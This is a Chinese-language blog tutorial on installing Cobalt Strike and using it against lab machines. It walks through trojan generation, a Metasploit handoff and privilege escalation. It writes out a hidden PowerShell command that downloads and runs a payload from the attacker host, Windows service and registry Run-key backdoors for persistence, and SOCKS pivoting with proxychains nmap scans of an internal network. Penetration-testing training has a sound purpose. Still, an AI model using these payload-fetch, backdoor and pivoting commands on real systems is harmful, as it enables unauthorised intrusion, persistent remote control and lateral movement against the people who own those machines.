【工具】Cobalt Strile安装及简单使用

简介

​ Cobalt Strike 一款以Metasploit为基础的GUI框架式渗透测试工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,exe、powershell木马生成等。

​ Cobalt Strike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,windows exe 木马生成,windows dll 木马生成,java 木马生成,office 宏病毒生成,木马捆绑。钓鱼攻击包括:站点克隆,目标信息获取,java 执行,浏览器自动攻击等等强大的功能!

安装

环境

服务端:kali(192.168.1.28)

客户端:Win10

服务端

将文件上传到kali中
【工具】Cobalt Strile安装及简单使用

进入cs4.0中文目录输入命令

./teamserver [kali-ip] [密码]

【工具】Cobalt Strile安装及简单使用

客户端

进入文件夹双击客户端启动脚本
【工具】Cobalt Strile安装及简单使用

**主机:**为我们刚刚建立服务器的IP地址
**端口:**端口不用管 默认就可以
**用户名:**随意都行 (默认就可以)
**密码:**输入刚才服务端密码

【工具】Cobalt Strile安装及简单使用

检查指纹
【工具】Cobalt Strile安装及简单使用

成功连接 【工具】Cobalt Strile安装及简单使用

软件说明

每个按钮的意思 【工具】Cobalt Strile安装及简单使用

演示实例

环境

攻击机:kali(192.168.1.28)

边缘主机:Win7(192.168.1.8、10.10.10.2)

内网主机:Winxp(10.10.10.3)

实例

创建监听 【工具】Cobalt Strile安装及简单使用
【工具】Cobalt Strile安装及简单使用
【工具】Cobalt Strile安装及简单使用

创建木马
【工具】Cobalt Strile安装及简单使用

选择监听器
【工具】Cobalt Strile安装及简单使用

选择木马保存路径
【工具】Cobalt Strile安装及简单使用
【工具】Cobalt Strile安装及简单使用

开启web服务
【工具】Cobalt Strile安装及简单使用

选择刚刚生成的木马文件
【工具】Cobalt Strile安装及简单使用
【工具】Cobalt Strile安装及简单使用

在靶机运行木马
【工具】Cobalt Strile安装及简单使用

靶机成功上线
【工具】Cobalt Strile安装及简单使用

【工具】Cobalt Strile安装及简单使用

联动MSF(shell)

MSF开启监听

use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.183.147
set lport 4444
run

【工具】Cobalt Strile安装及简单使用

创建两个监听器,一个使用windows/beacon_http/reverse_http来监听肉鸡,另一个使用windows/foreign/reverse_http来将获取到的控制权传给msf(注意:这里的端口要与msf监听的端口一致)

【工具】Cobalt Strile安装及简单使用
【工具】Cobalt Strile安装及简单使用

当目标上线后,选择目标点击鼠标右键选择增加会话
【工具】Cobalt Strile安装及简单使用

【工具】Cobalt Strile安装及简单使用

获取到的会话不稳定
【工具】Cobalt Strile安装及简单使用

提权

选中目标点击鼠标右键选择执行->提权
【工具】Cobalt Strile安装及简单使用

选择监听器
【工具】Cobalt Strile安装及简单使用

提权成功
【工具】Cobalt Strile安装及简单使用

权限维持

点击攻击->钓鱼攻击->script web delivery
【工具】Cobalt Strile安装及简单使用

选择监听器
【工具】Cobalt Strile安装及简单使用

点击开始生成如下命令

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.28:80/a'))"

在靶机上执行上面生成的命令会上线具有普通用户权限的主机
【工具】Cobalt Strile安装及简单使用

提权之后打开beacon shell并执行命令

shell sc create "name" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.183.28:80/a'))\""

【工具】Cobalt Strile安装及简单使用

在靶机上查看服务
【工具】Cobalt Strile安装及简单使用

将服务改为自动

shell sc config "name" start= auto

【工具】Cobalt Strile安装及简单使用
【工具】Cobalt Strile安装及简单使用

当靶机重启后依旧可以拿到权限

注册表后门

点击攻击->生成后门->windows executable

【工具】Cobalt Strile安装及简单使用

设置监听
【工具】Cobalt Strile安装及简单使用

保存到桌面
【工具】Cobalt Strile安装及简单使用

上传木马文件,选择会话点击鼠标右键选择目标->文件管理
【工具】Cobalt Strile安装及简单使用

选择木马文件进行上传
【工具】Cobalt Strile安装及简单使用

设置为注册表后门

shell reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "keyname" /t REG_SZ /d "C:\Users\aa\Desktop\artifact.exe" /f

【工具】Cobalt Strile安装及简单使用
【工具】Cobalt Strile安装及简单使用

也可以选择将exe设置为服务后门

shell sc create "exe" binpath= "C:\Users\abc\Desktop\artifact.exe"

【工具】Cobalt Strile安装及简单使用
【工具】Cobalt Strile安装及简单使用

设置Socks代理

开启socks4a代理,通过代理进行内网渗透
开启socks,可以通过命令,也可以通过右键选择中转->SOCKS Server
【工具】Cobalt Strile安装及简单使用

socks 12345

【工具】Cobalt Strile安装及简单使用

编辑proxychains.conf ,在文件末尾添加socks4代理服务器

vi /etc/proxychains.conf

【工具】Cobalt Strile安装及简单使用

使用proxychains代理扫描内网主机,socks4的代理,只能使用tcp协议,所以nmap使用的时候要使用-sT选择使用tcp协议,要使用-Pn不使用ICMP的ping确认主机存活

proxychains nmap -sT -Pn 10.10.10.0/24

【工具】Cobalt Strile安装及简单使用

可以判断出是存在主机10.10.10.3的,对内网主机10.10.10.3进行端口扫描

proxychains nmap -sT -Pn 10.10.10.3

【工具】Cobalt Strile安装及简单使用

联动MSF(扫描)

点击视图->代理信息->选择Socks4a Proxy,点击Tunnel
【工具】Cobalt Strile安装及简单使用

【工具】Cobalt Strile安装及简单使用

启动MSF输入方框中的内容

setg Proxies socks4:192.168.1.28:12345

【工具】Cobalt Strile安装及简单使用

扫描
【工具】Cobalt Strile安装及简单使用

上一篇:tomcat 服务版本内存设置


下一篇:bootstrap-fileinput使用